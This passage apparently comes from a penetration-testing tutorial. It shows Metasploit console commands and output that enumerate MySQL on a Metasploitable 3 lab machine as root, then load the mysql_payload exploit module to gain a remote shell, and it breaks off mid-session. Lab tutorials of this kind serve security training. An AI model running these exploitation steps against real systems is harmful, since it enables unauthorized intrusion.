To exploit the MySQL service on the Metasploitable 3 target machine, we will use the MySQL Enumeration Module auxiliary module to enumerate the target, and the Oracle MySQL for the Microsoft Windows Payload Execution exploit module to gain a remote shell:
msf > use auxiliary/admin/mysql/mysql_enummsf auxiliary(mysql_enum) > set RHOST 192.168.216.10RHOST => 192.168.216.10msf auxiliary(mysql_enum) > set USERNAME rootUSERNAME => rootmsf auxiliary(mysql_enum) > run[*] 192.168.216.10:3306 - Running MySQL Enumerator...[*] 192.168.216.10:3306 - Enumerating Parameters...msf auxiliary(mysql_enum) > use exploit/windows/mysql/mysql_payloadmsf exploit(mysql_payload) > set RHOST 192.168.216.10RHOST => 192.168.216.10msf exploit(mysql_payload) ...